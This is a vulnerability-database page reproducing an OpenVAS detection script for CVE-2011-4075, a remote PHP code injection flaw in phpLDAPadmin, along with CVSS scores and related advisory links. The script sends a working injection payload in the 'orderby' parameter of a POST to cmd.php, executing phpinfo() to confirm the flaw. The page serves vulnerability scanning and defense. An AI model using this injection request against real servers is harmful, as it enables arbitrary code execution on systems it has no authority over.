Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2011 Greenbone AGOPENVAS:1361412562310103314
HistoryOct 25, 2011 - 12:00 a.m.

phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability

2011-10-2500:00:00
Copyright (C) 2011 Greenbone AG
plugins.openvas.org
22

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

6.4

Confidence

Low

EPSS

0.364

Percentile

97.2%

JSON

phpLDAPadmin is prone to a remote PHP code-injection vulnerability.

# SPDX-FileCopyrightText: 2011 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103314");
  script_version("2023-07-28T05:05:23+0000");
  script_tag(name:"last_modification", value:"2023-07-28 05:05:23 +0000 (Fri, 28 Jul 2023)");
  script_tag(name:"creation_date", value:"2011-10-25 16:57:43 +0200 (Tue, 25 Oct 2011)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2011-4075");
  script_name("phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2011 Greenbone AG");
  script_dependencies("phpldapadmin_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("phpldapadmin/installed");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/50331");

  script_tag(name:"summary", value:"phpLDAPadmin is prone to a remote PHP code-injection vulnerability.");

  script_tag(name:"impact", value:"An attacker can exploit this issue to inject and execute arbitrary PHP
  code in the context of the affected application. This may facilitate a compromise of the application and
  the underlying system. Other attacks are also possible.");

  script_tag(name:"affected", value:"phpLDAPadmin versions 1.2.0 through 1.2.1.1 are vulnerable.");

  script_tag(name:"solution", value:"Updates are available.");

  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

CPE = "cpe:/a:phpldapadmin_project:phpldapadmin";

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

if(!port = get_app_port(cpe:CPE))
  exit(0);

if(!dir = get_app_location(cpe:CPE, port:port))
  exit(0);

if(dir == "/")
  dir = "";

url = string(dir, "/index.php");
req = http_get(item:url, port:port);
buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if(!buf)
  exit(0);

session_id = eregmatch(pattern:"Set-Cookie: ([^;]*);",string:buf);
if(isnull(session_id[1]))
  exit(0);

sess = session_id[1];

host = http_host_name(port:port);
payload = "cmd=query_engine&query=none&search=1&orderby=foo));}}phpinfo();die;/*";

req = string("POST ", dir , "/cmd.php HTTP/1.1\r\n",
             "Host: ", host,"\r\n",
             "Cookie: ", sess, "\r\n",
             "Content-Length: ", strlen(payload),"\r\n",
             "Content-Type: application/x-www-form-urlencoded\r\n",
             "Connection: close\r\n",
             "\r\n",
             payload);
res = http_send_recv(port:port, data:req);

if("<title>phpinfo()" >< res) {
  security_message(port:port);
  exit(0);
}

exit(99);

Related

cvelist 1
metasploit 1
openvas 11
debiancve 1
exploitdb 2
cve 1
checkpoint_advisories 1
nessus 5
ubuntucve 1
prion 1
dsquare 1
nvd 1
osv 1
debian 1
fedora 3
securityvulns 1
cvelist
cvelist
CVE-2011-4075
2011-11-02 17:00:00
metasploit
metasploit
phpLDAPadmin query_engine Remote PHP Code Injection
2011-10-24 23:22:32
openvas
openvas
phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability
2011-10-25 00:00:00
Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)
2011-11-03 00:00:00
Debian Security Advisory DSA 2333-1 (phpldapadmin)
2012-02-11 00:00:00
debiancve
debiancve
CVE-2011-4075
2011-11-02 17:55:01
exploitdb
exploitdb
phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (Metasploit) (2)
2011-10-25 00:00:00
phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (1)
2011-10-23 00:00:00
cve
cve
CVE-2011-4075
2011-11-02 17:55:01
checkpoint_advisories
checkpoint_advisories
PHP phpLDAPadmin Remote Code Execution (CVE-2011-4075)
2013-10-13 00:00:00
nessus
nessus
phpLDAPadmin orderby Parameter Arbitrary PHP Code Execution
2011-11-03 00:00:00
Fedora 15 : phpldapadmin-1.2.1.1-2.20111006git.fc15 (2011-14993)
2011-11-26 00:00:00
Fedora 16 : phpldapadmin-1.2.1.1-2.20111006git.fc16 (2011-14924)
2011-11-26 00:00:00
ubuntucve
ubuntucve
CVE-2011-4075
2011-11-02 00:00:00
prion
prion
Code injection
2011-11-02 17:55:00
dsquare
dsquare
phpLDAPadmin 1.2.1.1 RCE
2012-01-29 00:00:00
nvd
nvd
CVE-2011-4075
2011-11-02 17:55:01
osv
osv
phpldapadmin - several issues
2011-10-31 00:00:00
debian
debian
[SECURITY] [DSA 2333-1] phpldapadmin security update
2011-10-30 12:29:53
fedora
fedora
[SECURITY] Fedora 15 Update: phpldapadmin-1.2.1.1-2.20111006git.fc15
2011-11-25 02:05:42
[SECURITY] Fedora 16 Update: phpldapadmin-1.2.1.1-2.20111006git.fc16
2011-11-25 01:52:56
[SECURITY] Fedora 14 Update: phpldapadmin-1.2.1.1-2.20111006git.fc14
2011-11-25 01:56:24
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2011-11-06 00:00:00

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

6.4

Confidence

Low

EPSS

0.364

Percentile

97.2%

JSON
Related for OPENVAS:1361412562310103314
cvelist1metasploit1openvas11debiancve1exploitdb2cve1checkpoint_advisories1nessus5ubuntucve1prion1dsquare1nvd1osv1debian1fedora3securityvulns1